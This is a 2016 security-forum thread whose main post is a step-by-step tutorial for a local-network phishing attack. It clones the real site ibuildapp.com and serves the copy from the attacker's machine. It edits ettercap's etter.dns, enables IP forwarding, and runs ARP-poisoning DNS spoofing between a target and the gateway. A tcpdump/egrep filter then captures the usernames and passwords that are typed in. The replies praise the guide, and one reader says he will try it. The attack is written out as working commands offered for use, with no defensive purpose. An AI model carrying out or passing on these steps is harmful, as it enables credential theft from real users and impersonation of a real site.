Top-Hat-Sec

General Category => Security Tools => Topic started by: RedCor on March 22, 2016, 03:03:16 PM

Title: FAST TRACK "Simple phishing attack"
Post by: RedCor on March 22, 2016, 03:03:16 PM

FAST TRACK "Simple phishing attack"
I remade a tutorial because I find it easier and cool

We will have an infrastructure like this, if

a pc "Attacker" a "gateway" and the "target"

########################
PHISHING MADE SIMPLE   #
########################

################################################################################################
MACHINE : PC XP (target) ; PC KALI (Attacker) ; Routeur (gateway)                              #
USED SOFTWARE : your web browser (i use iceweacel) ; ettercap                            #
ATTACKER OBJECTIF : Spoofing DNS for redirect Target to the fake web site                  #
################################################################################################

################################################################################################
#
Step 1 Download your fake web site with your browser

Create folder

mkdir /home/download/phishing
Go in your browser in "Saved pages" and down on the right handside Select "Web Page,complete"
(http://i.imgur.com/pQl1ZHH.png?1)
(http://i.imgur.com/2HX780g.png?1)
(http://i.imgur.com/DPFvIZU.png?1)

You have a template for your  phishing.      
                                                      
Step 2 You must move the folder with the file html, you just download.                     
cd /var/www/                                                               
mv /home/download/phishing/website /var/www/website                                       
mv /home/download/phishing/website.html /var/www/index.html

(http://i.imgur.com/CNppCYC.png?1)

Step 3 Start your web server with python in the file /var/www/
python -m SimpleHTTPService 80

(http://i.imgur.com/1odOwqg.png?1)

################################################################################################

#START ATTACK SPOOF DNS               #

###########################################
#Modify the file : etter.dns for redirect fake website

leafpad /etc/ettercap/etter.dns


/etc/ettercap/etter.dns

ibuildapp.com      A   192.168.0.16
*.ibuildapp.com    A   192.168.0.16
www.ibuildapp.com  A   192.168.0.16

(http://i.imgur.com/uU0aNsH.png?1)
(http://i.imgur.com/e7upJI2.png?1)
###########################################
#Active Forward
echo 1 > /proc/sys/net/ipv4/ip_forward

(http://i.imgur.com/CC6ChDX.png?1)
###########################################
#Start dns spoofing
ettercap -i  eth0 -T -q -P dns_spoof -M arp:remote /target/ /gateway/

(http://i.imgur.com/QijOrwz.png?1)

#############################################
#Get login and password
tcpdump -i eth0 port http or port ftp or port smtp or port imap or port pop3 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line-buffered -B20

(http://i.imgur.com/QZPk1E0.png?1)
(http://i.imgur.com/MXEdUf9.png?1)
#############################################
#The target go to ibuildapp.com and tape login and password
Go in your target

(http://i.imgur.com/lIfKt2N.png?1)
(http://i.imgur.com/Ba6tz0Q.png?1)
(http://i.imgur.com/6r05I6f.png?1)

#############################################
#Look tcpdump filter

(http://i.imgur.com/o6Qk9tC.png?1)

(http://i.imgur.com/0sSOl9s.png)

Yeah you have login and password !

End.

Thank you for reading me
Title: Re: FAST TRACK "Simple phishing attack"
Post by: r3k0hu on March 23, 2016, 12:21:48 AM
+1 RedCor - that's an awesome write up, well put together!! Thank you!

Going to give this a try in the weekend - keep up the great work!
Title: Re: FAST TRACK "Simple phishing attack"
Post by: RedCor on March 23, 2016, 02:55:39 AM

Thank you r3k0hu for the +1 :) I prepare another tutorial on for and while loops
Title: Re: FAST TRACK "Simple phishing attack"
Post by: H4v0K on March 23, 2016, 04:33:56 AM
Very nice man thanks for posting  +1 :)
Title: Re: FAST TRACK "Simple phishing attack"
Post by: RedCor on March 24, 2016, 07:41:28 AM
Thank you  all readers

if you have any questions thank you to tell me, I do not use're sslstrip2 dnsproxy2 and because I wanted to make a simple redirect